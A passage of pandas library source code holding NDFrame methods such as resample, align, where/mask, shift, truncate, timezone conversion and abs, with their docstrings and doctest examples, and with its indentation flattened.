value in the bucket used as the label is not included in the bucket,
which it labels. For example, in the original series the
bucket ``2000-01-01 00:03:00`` contains the value 3, but the summed
value in the resampled bucket with the label ``2000-01-01 00:03:00``
does not include 3 (if it did, the summed value would be 6, not 3).
To include this value close the right side of the bin interval as
illustrated in the example below this one.
>>> series.resample('3T', label='right').sum()
2000-01-01 00:03:00 3
2000-01-01 00:06:00 12
2000-01-01 00:09:00 21
Freq: 3T, dtype: int64
Downsample the series into 3 minute bins as above, but close the right
side of the bin interval.
>>> series.resample('3T', label='right', closed='right').sum()
2000-01-01 00:00:00 0
2000-01-01 00:03:00 6
2000-01-01 00:06:00 15
2000-01-01 00:09:00 15
Freq: 3T, dtype: int64
Upsample the series into 30 second bins.
>>> series.resample('30S').asfreq()[0:5] #select first 5 rows
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 1.0
2000-01-01 00:01:30 NaN
2000-01-01 00:02:00 2.0
Freq: 30S, dtype: float64
Upsample the series into 30 second bins and fill the ``NaN``
values using the ``pad`` method.
>>> series.resample('30S').pad()[0:5]
2000-01-01 00:00:00 0
2000-01-01 00:00:30 0
2000-01-01 00:01:00 1
2000-01-01 00:01:30 1
2000-01-01 00:02:00 2
Freq: 30S, dtype: int64
Upsample the series into 30 second bins and fill the
``NaN`` values using the ``bfill`` method.
>>> series.resample('30S').bfill()[0:5]
2000-01-01 00:00:00 0
2000-01-01 00:00:30 1
2000-01-01 00:01:00 1
2000-01-01 00:01:30 2
2000-01-01 00:02:00 2
Freq: 30S, dtype: int64
Pass a custom function via ``apply``
>>> def custom_resampler(array_like):
... return np.sum(array_like)+5
>>> series.resample('3T').apply(custom_resampler)
2000-01-01 00:00:00 8
2000-01-01 00:03:00 17
2000-01-01 00:06:00 26
Freq: 3T, dtype: int64
For a Series with a PeriodIndex, the keyword `convention` can be
used to control whether to use the start or end of `rule`.
>>> s = pd.Series([1, 2], index=pd.period_range('2012-01-01',
freq='A',
periods=2))
>>> s
2012 1
2013 2
Freq: A-DEC, dtype: int64
Resample by month using 'start' `convention`. Values are assigned to
the first month of the period.
>>> s.resample('M', convention='start').asfreq().head()
2012-01 1.0
2012-02 NaN
2012-03 NaN
2012-04 NaN
2012-05 NaN
Freq: M, dtype: float64
Resample by month using 'end' `convention`. Values are assigned to
the last month of the period.
>>> s.resample('M', convention='end').asfreq()
2012-12 1.0
2013-01 NaN
2013-02 NaN
2013-03 NaN
2013-04 NaN
2013-05 NaN
2013-06 NaN
2013-07 NaN
2013-08 NaN
2013-09 NaN
2013-10 NaN
2013-11 NaN
2013-12 2.0
Freq: M, dtype: float64
For DataFrame objects, the keyword ``on`` can be used to specify the
column instead of the index for resampling.
>>> df = pd.DataFrame(data=9*[range(4)], columns=['a', 'b', 'c', 'd'])
>>> df['time'] = pd.date_range('1/1/2000', periods=9, freq='T')
>>> df.resample('3T', on='time').sum()
a b c d
time
2000-01-01 00:00:00 0 3 6 9
2000-01-01 00:03:00 0 3 6 9
2000-01-01 00:06:00 0 3 6 9
For a DataFrame with MultiIndex, the keyword ``level`` can be used to
specify on level the resampling needs to take place.
>>> time = pd.date_range('1/1/2000', periods=5, freq='T')
>>> df2 = pd.DataFrame(data=10*[range(4)],
columns=['a', 'b', 'c', 'd'],
index=pd.MultiIndex.from_product([time, [1, 2]])
)
>>> df2.resample('3T', level=0).sum()
a b c d
2000-01-01 00:00:00 0 6 12 18
2000-01-01 00:03:00 0 4 8 12
See also
--------
groupby : Group by mapping, function, label, or list of labels.
"""
from pandas.core.resample import (resample,
_maybe_process_deprecations)
axis = self._get_axis_number(axis)
r = resample(self, freq=rule, label=label, closed=closed,
axis=axis, kind=kind, loffset=loffset,
convention=convention,
base=base, key=on, level=level)
return _maybe_process_deprecations(r,
how=how,
fill_method=fill_method,
limit=limit)
def first(self, offset):
"""
Convenience method for subsetting initial periods of time series data
based on a date offset.
Parameters
----------
offset : string, DateOffset, dateutil.relativedelta
Examples
--------
ts.first('10D') -> First 10 days
Returns
-------
subset : type of caller
"""
from pandas.tseries.frequencies import to_offset
if not isinstance(self.index, DatetimeIndex):
raise NotImplementedError("'first' only supports a DatetimeIndex "
"index")
if len(self.index) == 0:
return self
offset = to_offset(offset)
end_date = end = self.index[0] + offset
# Tick-like, e.g. 3 weeks
if not offset.isAnchored() and hasattr(offset, '_inc'):
if end_date in self.index:
end = self.index.searchsorted(end_date, side='left')
return self.iloc[:end]
return self.loc[:end]
def last(self, offset):
"""
Convenience method for subsetting final periods of time series data
based on a date offset.
Parameters
----------
offset : string, DateOffset, dateutil.relativedelta
Examples
--------
ts.last('5M') -> Last 5 months
Returns
-------
subset : type of caller
"""
from pandas.tseries.frequencies import to_offset
if not isinstance(self.index, DatetimeIndex):
raise NotImplementedError("'last' only supports a DatetimeIndex "
"index")
if len(self.index) == 0:
return self
offset = to_offset(offset)
start_date = self.index[-1] - offset
start = self.index.searchsorted(start_date, side='right')
return self.iloc[start:]
def rank(self, axis=0, method='average', numeric_only=None,
na_option='keep', ascending=True, pct=False):
"""
Compute numerical data ranks (1 through n) along axis. Equal values are
assigned a rank that is the average of the ranks of those values
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
index to direct ranking
method : {'average', 'min', 'max', 'first', 'dense'}
* average: average rank of group
* min: lowest rank in group
* max: highest rank in group
* first: ranks assigned in order they appear in the array
* dense: like 'min', but rank always increases by 1 between groups
numeric_only : boolean, default None
Include only float, int, boolean data. Valid only for DataFrame or
Panel objects
na_option : {'keep', 'top', 'bottom'}
* keep: leave NA values where they are
* top: smallest rank if ascending
* bottom: smallest rank if descending
ascending : boolean, default True
False for ranks by high (1) to low (N)
pct : boolean, default False
Computes percentage rank of data
Returns
-------
ranks : same type as caller
"""
axis = self._get_axis_number(axis)
if self.ndim > 2:
msg = "rank does not make sense when ndim > 2"
raise NotImplementedError(msg)
def ranker(data):
ranks = algos.rank(data.values, axis=axis, method=method,
ascending=ascending, na_option=na_option,
pct=pct)
ranks = self._constructor(ranks, **data._construct_axes_dict())
return ranks.__finalize__(self)
# if numeric_only is None, and we can't get anything, we try with
# numeric_only=True
if numeric_only is None:
try:
return ranker(self)
except TypeError:
numeric_only = True
if numeric_only:
data = self._get_numeric_data()
else:
data = self
return ranker(data)
_shared_docs['align'] = ("""
Align two objects on their axes with the
specified join method for each axis Index
Parameters
----------
other : DataFrame or Series
join : {'outer', 'inner', 'left', 'right'}, default 'outer'
axis : allowed axis of the other object, default None
Align on index (0), columns (1), or both (None)
level : int or level name, default None
Broadcast across a level, matching Index values on the
passed MultiIndex level
copy : boolean, default True
Always returns new objects. If copy=False and no reindexing is
required then original objects are returned.
fill_value : scalar, default np.NaN
Value to use for missing values. Defaults to NaN, but can be any
"compatible" value
method : str, default None
limit : int, default None
fill_axis : %(axes_single_arg)s, default 0
Filling axis, method and limit
broadcast_axis : %(axes_single_arg)s, default None
Broadcast values along this axis, if aligning two objects of
different dimensions
Returns
-------
(left, right) : (%(klass)s, type of other)
Aligned objects
""")
@Appender(_shared_docs['align'] % _shared_doc_kwargs)
def align(self, other, join='outer', axis=None, level=None, copy=True,
fill_value=None, method=None, limit=None, fill_axis=0,
broadcast_axis=None):
from pandas import DataFrame, Series
method = missing.clean_fill_method(method)
if broadcast_axis == 1 and self.ndim != other.ndim:
if isinstance(self, Series):
# this means other is a DataFrame, and we need to broadcast
# self
cons = self._constructor_expanddim
df = cons({c: self for c in other.columns},
**other._construct_axes_dict())
return df._align_frame(other, join=join, axis=axis,
level=level, copy=copy,
fill_value=fill_value, method=method,
limit=limit, fill_axis=fill_axis)
elif isinstance(other, Series):
# this means self is a DataFrame, and we need to broadcast
# other
cons = other._constructor_expanddim
df = cons({c: other for c in self.columns},
**self._construct_axes_dict())
return self._align_frame(df, join=join, axis=axis, level=level,
copy=copy, fill_value=fill_value,
method=method, limit=limit,
fill_axis=fill_axis)
if axis is not None:
axis = self._get_axis_number(axis)
if isinstance(other, DataFrame):
return self._align_frame(other, join=join, axis=axis, level=level,
copy=copy, fill_value=fill_value,
method=method, limit=limit,
fill_axis=fill_axis)
elif isinstance(other, Series):
return self._align_series(other, join=join, axis=axis, level=level,
copy=copy, fill_value=fill_value,
method=method, limit=limit,
fill_axis=fill_axis)
else: # pragma: no cover
raise TypeError('unsupported type: %s' % type(other))
def _align_frame(self, other, join='outer', axis=None, level=None,
copy=True, fill_value=np.nan, method=None, limit=None,
fill_axis=0):
# defaults
join_index, join_columns = None, None
ilidx, iridx = None, None
clidx, cridx = None, None
is_series = isinstance(self, ABCSeries)
if axis is None or axis == 0:
if not self.index.equals(other.index):
join_index, ilidx, iridx = self.index.join(
other.index, how=join, level=level, return_indexers=True)
if axis is None or axis == 1:
if not is_series and not self.columns.equals(other.columns):
join_columns, clidx, cridx = self.columns.join(
other.columns, how=join, level=level, return_indexers=True)
if is_series:
reindexers = {0: [join_index, ilidx]}
else:
reindexers = {0: [join_index, ilidx], 1: [join_columns, clidx]}
left = self._reindex_with_indexers(reindexers, copy=copy,
fill_value=fill_value,
allow_dups=True)
# other must be always DataFrame
right = other._reindex_with_indexers({0: [join_index, iridx],
1: [join_columns, cridx]},
copy=copy, fill_value=fill_value,
allow_dups=True)
if method is not None:
left = left.fillna(axis=fill_axis, method=method, limit=limit)
right = right.fillna(axis=fill_axis, method=method, limit=limit)
# if DatetimeIndex have different tz, convert to UTC
if is_datetime64tz_dtype(left.index):
if left.index.tz != right.index.tz:
if join_index is not None:
left.index = join_index
right.index = join_index
return left.__finalize__(self), right.__finalize__(other)
def _align_series(self, other, join='outer', axis=None, level=None,
copy=True, fill_value=None, method=None, limit=None,
fill_axis=0):
is_series = isinstance(self, ABCSeries)
# series/series compat, other must always be a Series
if is_series:
if axis:
raise ValueError('cannot align series to a series other than '
'axis 0')
# equal
if self.index.equals(other.index):
join_index, lidx, ridx = None, None, None
else:
join_index, lidx, ridx = self.index.join(other.index, how=join,
level=level,
return_indexers=True)
left = self._reindex_indexer(join_index, lidx, copy)
right = other._reindex_indexer(join_index, ridx, copy)
else:
# one has > 1 ndim
fdata = self._data
if axis == 0:
join_index = self.index
lidx, ridx = None, None
if not self.index.equals(other.index):
join_index, lidx, ridx = self.index.join(
other.index, how=join, level=level,
return_indexers=True)
if lidx is not None:
fdata = fdata.reindex_indexer(join_index, lidx, axis=1)
elif axis == 1:
join_index = self.columns
lidx, ridx = None, None
if not self.columns.equals(other.index):
join_index, lidx, ridx = self.columns.join(
other.index, how=join, level=level,
return_indexers=True)
if lidx is not None:
fdata = fdata.reindex_indexer(join_index, lidx, axis=0)
else:
raise ValueError('Must specify axis=0 or 1')
if copy and fdata is self._data:
fdata = fdata.copy()
left = self._constructor(fdata)
if ridx is None:
right = other
else:
right = other.reindex(join_index, level=level)
# fill
fill_na = notna(fill_value) or (method is not None)
if fill_na:
left = left.fillna(fill_value, method=method, limit=limit,
axis=fill_axis)
right = right.fillna(fill_value, method=method, limit=limit)
# if DatetimeIndex have different tz, convert to UTC
if is_series or (not is_series and axis == 0):
if is_datetime64tz_dtype(left.index):
if left.index.tz != right.index.tz:
if join_index is not None:
left.index = join_index
right.index = join_index
return left.__finalize__(self), right.__finalize__(other)
def _where(self, cond, other=np.nan, inplace=False, axis=None, level=None,
errors='raise', try_cast=False):
"""
Equivalent to public method `where`, except that `other` is not
applied as a function even if callable. Used in __setitem__.
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
# align the cond to same shape as myself
cond = com._apply_if_callable(cond, self)
if isinstance(cond, NDFrame):
cond, _ = cond.align(self, join='right', broadcast_axis=1)
else:
if not hasattr(cond, 'shape'):
cond = np.asanyarray(cond)
if cond.shape != self.shape:
raise ValueError('Array conditional must be same shape as '
'self')
cond = self._constructor(cond, **self._construct_axes_dict())
# make sure we are boolean
fill_value = True if inplace else False
cond = cond.fillna(fill_value)
msg = "Boolean array expected for the condition, not {dtype}"
if not isinstance(cond, pd.DataFrame):
# This is a single-dimensional object.
if not is_bool_dtype(cond):
raise ValueError(msg.format(dtype=cond.dtype))
else:
for dt in cond.dtypes:
if not is_bool_dtype(dt):
raise ValueError(msg.format(dtype=dt))
cond = cond.astype(bool, copy=False)
cond = -cond if inplace else cond
# try to align with other
try_quick = True
if hasattr(other, 'align'):
# align with me
if other.ndim <= self.ndim:
_, other = self.align(other, join='left', axis=axis,
level=level, fill_value=np.nan)
# if we are NOT aligned, raise as we cannot where index
if (axis is None and
not all(other._get_axis(i).equals(ax)
for i, ax in enumerate(self.axes))):
raise InvalidIndexError
# slice me out of the other
else:
raise NotImplementedError("cannot align with a higher "
"dimensional NDFrame")
if isinstance(other, np.ndarray):
if other.shape != self.shape:
if self.ndim == 1:
icond = cond.values
# GH 2745 / GH 4192
# treat like a scalar
if len(other) == 1:
other = np.array(other[0])
# GH 3235
# match True cond to other
elif len(cond[icond]) == len(other):
# try to not change dtype at first (if try_quick)
if try_quick:
try:
new_other = com._values_from_object(self)
new_other = new_other.copy()
new_other[icond] = other
other = new_other
except Exception:
try_quick = False
# let's create a new (if we failed at the above
# or not try_quick
if not try_quick:
dtype, fill_value = maybe_promote(other.dtype)
new_other = np.empty(len(icond), dtype=dtype)
new_other.fill(fill_value)
maybe_upcast_putmask(new_other, icond, other)
other = new_other
else:
raise ValueError('Length of replacements must equal '
'series length')
else:
raise ValueError('other must be the same shape as self '
'when an ndarray')
# we are the same shape, so create an actual object for alignment
else:
other = self._constructor(other, **self._construct_axes_dict())
if axis is None:
axis = 0
if self.ndim == getattr(other, 'ndim', 0):
align = True
else:
align = (self._get_axis_number(axis) == 1)
block_axis = self._get_block_manager_axis(axis)
if inplace:
# we may have different type blocks come out of putmask, so
# reconstruct the block manager
self._check_inplace_setting(other)
new_data = self._data.putmask(mask=cond, new=other, align=align,
inplace=True, axis=block_axis,
transpose=self._AXIS_REVERSED)
self._update_inplace(new_data)
else:
new_data = self._data.where(other=other, cond=cond, align=align,
errors=errors,
try_cast=try_cast, axis=block_axis,
transpose=self._AXIS_REVERSED)
return self._constructor(new_data).__finalize__(self)
_shared_docs['where'] = ("""
Return an object of same shape as self and whose corresponding
entries are from self where `cond` is %(cond)s and otherwise are from
`other`.
Parameters
----------
cond : boolean %(klass)s, array-like, or callable
Where `cond` is %(cond)s, keep the original value. Where
%(cond_rev)s, replace with corresponding value from `other`.
If `cond` is callable, it is computed on the %(klass)s and
should return boolean %(klass)s or array. The callable must
not change input %(klass)s (though pandas doesn't check it).
.. versionadded:: 0.18.1
A callable can be used as cond.
other : scalar, %(klass)s, or callable
Entries where `cond` is %(cond_rev)s are replaced with
corresponding value from `other`.
If other is callable, it is computed on the %(klass)s and
should return scalar or %(klass)s. The callable must not
change input %(klass)s (though pandas doesn't check it).
.. versionadded:: 0.18.1
A callable can be used as other.
inplace : boolean, default False
Whether to perform the operation in place on the data
axis : alignment axis if needed, default None
level : alignment level if needed, default None
errors : str, {'raise', 'ignore'}, default 'raise'
- ``raise`` : allow exceptions to be raised
- ``ignore`` : suppress exceptions. On error return original object
Note that currently this parameter won't affect
the results and will always coerce to a suitable dtype.
try_cast : boolean, default False
try to cast the result back to the input type (if possible),
raise_on_error : boolean, default True
Whether to raise on invalid data types (e.g. trying to where on
strings)
.. deprecated:: 0.21.0
Returns
-------
wh : same type as caller
Notes
-----
The %(name)s method is an application of the if-then idiom. For each
element in the calling DataFrame, if ``cond`` is ``%(cond)s`` the
element is used; otherwise the corresponding element from the DataFrame
``other`` is used.
The signature for :func:`DataFrame.where` differs from
:func:`numpy.where`. Roughly ``df1.where(m, df2)`` is equivalent to
``np.where(m, df1, df2)``.
For further details and examples see the ``%(name)s`` documentation in
:ref:`indexing <indexing.where_mask>`.
Examples
--------
>>> s = pd.Series(range(5))
>>> s.where(s > 0)
0 NaN
1 1.0
2 2.0
3 3.0
4 4.0
>>> s.mask(s > 0)
0 0.0
1 NaN
2 NaN
3 NaN
4 NaN
>>> s.where(s > 1, 10)
0 10.0
1 10.0
2 2.0
3 3.0
4 4.0
>>> df = pd.DataFrame(np.arange(10).reshape(-1, 2), columns=['A', 'B'])
>>> m = df %% 3 == 0
>>> df.where(m, -df)
A B
0 0 -1
1 -2 3
2 -4 -5
3 6 -7
4 -8 9
>>> df.where(m, -df) == np.where(m, df, -df)
A B
0 True True
1 True True
2 True True
3 True True
4 True True
>>> df.where(m, -df) == df.mask(~m, -df)
A B
0 True True
1 True True
2 True True
3 True True
4 True True
See Also
--------
:func:`DataFrame.%(name_other)s`
""")
@Appender(_shared_docs['where'] % dict(_shared_doc_kwargs, cond="True",
cond_rev="False", name='where',
name_other='mask'))
def where(self, cond, other=np.nan, inplace=False, axis=None, level=None,
errors='raise', try_cast=False, raise_on_error=None):
if raise_on_error is not None:
warnings.warn(
"raise_on_error is deprecated in "
"favor of errors='raise|ignore'",
FutureWarning, stacklevel=2)
if raise_on_error:
errors = 'raise'
else:
errors = 'ignore'
other = com._apply_if_callable(other, self)
return self._where(cond, other, inplace, axis, level,
errors=errors, try_cast=try_cast)
@Appender(_shared_docs['where'] % dict(_shared_doc_kwargs, cond="False",
cond_rev="True", name='mask',
name_other='where'))
def mask(self, cond, other=np.nan, inplace=False, axis=None, level=None,
errors='raise', try_cast=False, raise_on_error=None):
if raise_on_error is not None:
warnings.warn(
"raise_on_error is deprecated in "
"favor of errors='raise|ignore'",
FutureWarning, stacklevel=2)
if raise_on_error:
errors = 'raise'
else:
errors = 'ignore'
inplace = validate_bool_kwarg(inplace, 'inplace')
cond = com._apply_if_callable(cond, self)
return self.where(~cond, other=other, inplace=inplace, axis=axis,
level=level, try_cast=try_cast,
errors=errors)
_shared_docs['shift'] = ("""
Shift index by desired number of periods with an optional time freq
Parameters
----------
periods : int
Number of periods to move, can be positive or negative
freq : DateOffset, timedelta, or time rule string, optional
Increment to use from the tseries module or time rule (e.g. 'EOM').
See Notes.
axis : %(axes_single_arg)s
Notes
-----
If freq is specified then the index values are shifted but the data
is not realigned. That is, use freq if you would like to extend the
index when shifting and preserve the original data.
Returns
-------
shifted : %(klass)s
""")
@Appender(_shared_docs['shift'] % _shared_doc_kwargs)
def shift(self, periods=1, freq=None, axis=0):
if periods == 0:
return self
block_axis = self._get_block_manager_axis(axis)
if freq is None:
new_data = self._data.shift(periods=periods, axis=block_axis)
else:
return self.tshift(periods, freq)
return self._constructor(new_data).__finalize__(self)
def slice_shift(self, periods=1, axis=0):
"""
Equivalent to `shift` without copying data. The shifted data will
not include the dropped periods and the shifted axis will be smaller
than the original.
Parameters
----------
periods : int
Number of periods to move, can be positive or negative
Notes
-----
While the `slice_shift` is faster than `shift`, you may pay for it
later during alignment.
Returns
-------
shifted : same type as caller
"""
if periods == 0:
return self
if periods > 0:
vslicer = slice(None, -periods)
islicer = slice(periods, None)
else:
vslicer = slice(-periods, None)
islicer = slice(None, periods)
new_obj = self._slice(vslicer, axis=axis)
shifted_axis = self._get_axis(axis)[islicer]
new_obj.set_axis(shifted_axis, axis=axis, inplace=True)
return new_obj.__finalize__(self)
def tshift(self, periods=1, freq=None, axis=0):
"""
Shift the time index, using the index's frequency if available.
Parameters
----------
periods : int
Number of periods to move, can be positive or negative
freq : DateOffset, timedelta, or time rule string, default None
Increment to use from the tseries module or time rule (e.g. 'EOM')
axis : int or basestring
Corresponds to the axis that contains the Index
Notes
-----
If freq is not specified then tries to use the freq or inferred_freq
attributes of the index. If neither of those attributes exist, a
ValueError is thrown
Returns
-------
shifted : NDFrame
"""
index = self._get_axis(axis)
if freq is None:
freq = getattr(index, 'freq', None)
if freq is None:
freq = getattr(index, 'inferred_freq', None)
if freq is None:
msg = 'Freq was not given and was not set in the index'
raise ValueError(msg)
if periods == 0:
return self
if isinstance(freq, string_types):
freq = to_offset(freq)
block_axis = self._get_block_manager_axis(axis)
if isinstance(index, PeriodIndex):
orig_freq = to_offset(index.freq)
if freq == orig_freq:
new_data = self._data.copy()
new_data.axes[block_axis] = index.shift(periods)
else:
msg = ('Given freq %s does not match PeriodIndex freq %s' %
(freq.rule_code, orig_freq.rule_code))
raise ValueError(msg)
else:
new_data = self._data.copy()
new_data.axes[block_axis] = index.shift(periods, freq)
return self._constructor(new_data).__finalize__(self)
def truncate(self, before=None, after=None, axis=None, copy=True):
"""
Truncate a Series or DataFrame before and after some index value.
This is a useful shorthand for boolean indexing based on index
values above or below certain thresholds.
Parameters
----------
before : date, string, int
Truncate all rows before this index value.
after : date, string, int
Truncate all rows after this index value.
axis : {0 or 'index', 1 or 'columns'}, optional
Axis to truncate. Truncates the index (rows) by default.
copy : boolean, default is True,
Return a copy of the truncated section.
Returns
-------
type of caller
The truncated Series or DataFrame.
See Also
--------
DataFrame.loc : Select a subset of a DataFrame by label.
DataFrame.iloc : Select a subset of a DataFrame by position.
Notes
-----
If the index being truncated contains only datetime values,
`before` and `after` may be specified as strings instead of
Timestamps.
Examples
--------
>>> df = pd.DataFrame({'A': ['a', 'b', 'c', 'd', 'e'],
... 'B': ['f', 'g', 'h', 'i', 'j'],
... 'C': ['k', 'l', 'm', 'n', 'o']},
... index=[1, 2, 3, 4, 5])
>>> df
A B C
1 a f k
2 b g l
3 c h m
4 d i n
5 e j o
>>> df.truncate(before=2, after=4)
A B C
2 b g l
3 c h m
4 d i n
The columns of a DataFrame can be truncated.
>>> df.truncate(before="A", after="B", axis="columns")
A B
1 a f
2 b g
3 c h
4 d i
5 e j
For Series, only rows can be truncated.
>>> df['A'].truncate(before=2, after=4)
2 b
3 c
4 d
Name: A, dtype: object
The index values in ``truncate`` can be datetimes or string
dates.
>>> dates = pd.date_range('2016-01-01', '2016-02-01', freq='s')
>>> df = pd.DataFrame(index=dates, data={'A': 1})
>>> df.tail()
A
2016-01-31 23:59:56 1
2016-01-31 23:59:57 1
2016-01-31 23:59:58 1
2016-01-31 23:59:59 1
2016-02-01 00:00:00 1
>>> df.truncate(before=pd.Timestamp('2016-01-05'),
... after=pd.Timestamp('2016-01-10')).tail()
A
2016-01-09 23:59:56 1
2016-01-09 23:59:57 1
2016-01-09 23:59:58 1
2016-01-09 23:59:59 1
2016-01-10 00:00:00 1
Because the index is a DatetimeIndex containing only dates, we can
specify `before` and `after` as strings. They will be coerced to
Timestamps before truncation.
>>> df.truncate('2016-01-05', '2016-01-10').tail()
A
2016-01-09 23:59:56 1
2016-01-09 23:59:57 1
2016-01-09 23:59:58 1
2016-01-09 23:59:59 1
2016-01-10 00:00:00 1
Note that ``truncate`` assumes a 0 value for any unspecified time
component (midnight). This differs from partial string slicing, which
returns any partially matching dates.
>>> df.loc['2016-01-05':'2016-01-10', :].tail()
A
2016-01-10 23:59:55 1
2016-01-10 23:59:56 1
2016-01-10 23:59:57 1
2016-01-10 23:59:58 1
2016-01-10 23:59:59 1
"""
if axis is None:
axis = self._stat_axis_number
axis = self._get_axis_number(axis)
ax = self._get_axis(axis)
# GH 17935
# Check that index is sorted
if not ax.is_monotonic_increasing and not ax.is_monotonic_decreasing:
raise ValueError("truncate requires a sorted index")
# if we have a date index, convert to dates, otherwise
# treat like a slice
if ax.is_all_dates:
from pandas.core.tools.datetimes import to_datetime
before = to_datetime(before)
after = to_datetime(after)
if before is not None and after is not None:
if before > after:
raise ValueError('Truncate: %s must be after %s' %
(after, before))
slicer = [slice(None, None)] * self._AXIS_LEN
slicer[axis] = slice(before, after)
result = self.loc[tuple(slicer)]
if isinstance(ax, MultiIndex):
setattr(result, self._get_axis_name(axis),
ax.truncate(before, after))
if copy:
result = result.copy()
return result
def tz_convert(self, tz, axis=0, level=None, copy=True):
"""
Convert tz-aware axis to target time zone.
Parameters
----------
tz : string or pytz.timezone object
axis : the axis to convert
level : int, str, default None
If axis ia a MultiIndex, convert a specific level. Otherwise
must be None
copy : boolean, default True
Also make a copy of the underlying data
Returns
-------
Raises
------
TypeError
If the axis is tz-naive.
"""
axis = self._get_axis_number(axis)
ax = self._get_axis(axis)
def _tz_convert(ax, tz):
if not hasattr(ax, 'tz_convert'):
if len(ax) > 0:
ax_name = self._get_axis_name(axis)
raise TypeError('%s is not a valid DatetimeIndex or '
'PeriodIndex' % ax_name)
else:
ax = DatetimeIndex([], tz=tz)
else:
ax = ax.tz_convert(tz)
return ax
# if a level is given it must be a MultiIndex level or
# equivalent to the axis name
if isinstance(ax, MultiIndex):
level = ax._get_level_number(level)
new_level = _tz_convert(ax.levels[level], tz)
ax = ax.set_levels(new_level, level=level)
else:
if level not in (None, 0, ax.name):
raise ValueError("The level {0} is not valid".format(level))
ax = _tz_convert(ax, tz)
result = self._constructor(self._data, copy=copy)
result.set_axis(ax, axis=axis, inplace=True)
return result.__finalize__(self)
def tz_localize(self, tz, axis=0, level=None, copy=True,
ambiguous='raise'):
"""
Localize tz-naive TimeSeries to target time zone.
Parameters
----------
tz : string or pytz.timezone object
axis : the axis to localize
level : int, str, default None
If axis ia a MultiIndex, localize a specific level. Otherwise
must be None
copy : boolean, default True
Also make a copy of the underlying data
ambiguous : 'infer', bool-ndarray, 'NaT', default 'raise'
- 'infer' will attempt to infer fall dst-transition hours based on
order
- bool-ndarray where True signifies a DST time, False designates
a non-DST time (note that this flag is only applicable for
ambiguous times)
- 'NaT' will return NaT where there are ambiguous times
- 'raise' will raise an AmbiguousTimeError if there are ambiguous
times
Returns
-------
Raises
------
TypeError
If the TimeSeries is tz-aware and tz is not None.
"""
axis = self._get_axis_number(axis)
ax = self._get_axis(axis)
def _tz_localize(ax, tz, ambiguous):
if not hasattr(ax, 'tz_localize'):
if len(ax) > 0:
ax_name = self._get_axis_name(axis)
raise TypeError('%s is not a valid DatetimeIndex or '
'PeriodIndex' % ax_name)
else:
ax = DatetimeIndex([], tz=tz)
else:
ax = ax.tz_localize(tz, ambiguous=ambiguous)
return ax
# if a level is given it must be a MultiIndex level or
# equivalent to the axis name
if isinstance(ax, MultiIndex):
level = ax._get_level_number(level)
new_level = _tz_localize(ax.levels[level], tz, ambiguous)
ax = ax.set_levels(new_level, level=level)
else:
if level not in (None, 0, ax.name):
raise ValueError("The level {0} is not valid".format(level))
ax = _tz_localize(ax, tz, ambiguous)
result = self._constructor(self._data, copy=copy)
result.set_axis(ax, axis=axis, inplace=True)
return result.__finalize__(self)
# ----------------------------------------------------------------------
# Numeric Methods
def abs(self):
"""
Return a Series/DataFrame with absolute numeric value of each element.
This function only applies to elements that are all numeric.
Returns
-------
abs
Series/DataFrame containing the absolute value of each element.
Notes
-----
For ``complex`` inputs, ``1.2 + 1j``, the absolute value is
:math:`\\sqrt{ a^2 + b^2 }`.
Examples
--------
Absolute numeric values in a Series.
>>> s = pd.Series([-1.10, 2, -3.33, 4])
>>> s.abs()
0 1.10
1 2.00
2 3.33
3 4.00
dtype: float64
Absolute numeric values in a Series with complex numbers.
>>> s = pd.Series([1.2 + 1j])
>>> s.abs()
0 1.56205
dtype: float64
Absolute numeric values in a Series with a Timedelta element.
>>> s = pd.Series([pd.Timedelta('1 days')])
>>> s.abs()
0 1 days
dtype: timedelta64[ns]
Select rows with data closest to certain value using argsort (from
`StackOverflow <https://stackoverflow.com/a/17758115>`__).
>>> df = pd.DataFrame({
... 'a': [4, 5, 6, 7],
... 'b': [10, 20, 30, 40],
... 'c': [100, 50, -30, -50]
... })
>>> df
a b c
0 4 10 100
1 5 20 50
2 6 30 -30
3 7 40 -50
>>> df.loc[(df.c - 43).abs().argsort()]
a b c
1 5 20 50
0 4 10 100
2 6 30 -30
3 7 40 -50
See Also
--------
numpy.absolute : calculate the absolute value element-wise.
"""
return np.abs(self)
def describe(self, percentiles=None, include=None, exclude=None):
"""
Generates descriptive statistics that summarize the central tendency,
dispersion and shape of a dataset's distribution, excluding
``NaN`` values.
Analyzes both numeric and object series, as well
as ``DataFrame`` column sets of mixed data types. The output
will vary depending on what is provided. Refer to the notes
below for more detail.
Parameters
----------
percentiles : list-like of numbers, optional
The percentiles to include in the output. All should
fall between 0 and 1. The default is
``[.25, .5, .75]``, which returns the 25th, 50th, and
75th percentiles.
include : 'all', list-like of dtypes or None (default), optional
A white list of data types to include in the result. Ignored
for ``Series``. Here are the options:
- 'all' : All columns of the input will be included in the output.
- A list-like of dtypes : Limits the results to the
provided data types.
To limit the result to numeric types submit
``numpy.number``. To limit it instead to object columns submit
the ``numpy.object`` data type. Strings
can also be used in the style of
``select_dtypes`` (e.g. ``df.describe(include=['O'])``). To
select pandas categorical columns, use ``'category'``
- None (default) : The result will include all numeric columns.
exclude : list-like of dtypes or None (default), optional,
A black list of data types to omit from the result. Ignored
for ``Series``. Here are the options:
- A list-like of dtypes : Excludes the provided data types
from the result. To exclude numeric types submit
``numpy.number``. To exclude object columns submit the data
type ``numpy.object``. Strings can also be used in the style of
``select_dtypes`` (e.g. ``df.describe(include=['O'])``). To
exclude pandas categorical columns, use ``'category'``
- None (default) : The result will exclude nothing.
Returns
-------
summary: Series/DataFrame of summary statistics
Notes
-----
For numeric data, the result's index will include ``count``,
``mean``, ``std``, ``min``, ``max`` as well as lower, ``50`` and
upper percentiles. By default the lower percentile is ``25`` and the
upper percentile is ``75``. The ``50`` percentile is the
same as the median.
For object data (e.g. strings or timestamps), the result's index
will include ``count``, ``unique``, ``top``, and ``freq``. The ``top``
is the most common value. The ``freq`` is the most common value's
frequency. Timestamps also include the ``first`` and ``last`` items.
If multiple object values have the highest count, then the
``count`` and ``top`` results will be arbitrarily chosen from
among those with the highest count.
For mixed data types provided via a ``DataFrame``, the default is to
return only an analysis of numeric columns. If the dataframe consists
only of object and categorical data without any numeric columns, the
default is to return an analysis of both the object and categorical
columns. If ``include='all'`` is provided as an option, the result
will include a union of attributes of each type.
The `include` and `exclude` parameters can be used to limit
which columns in a ``DataFrame`` are analyzed for the output.
The parameters are ignored when analyzing a ``Series``.
Examples
--------
Describing a numeric ``Series``.
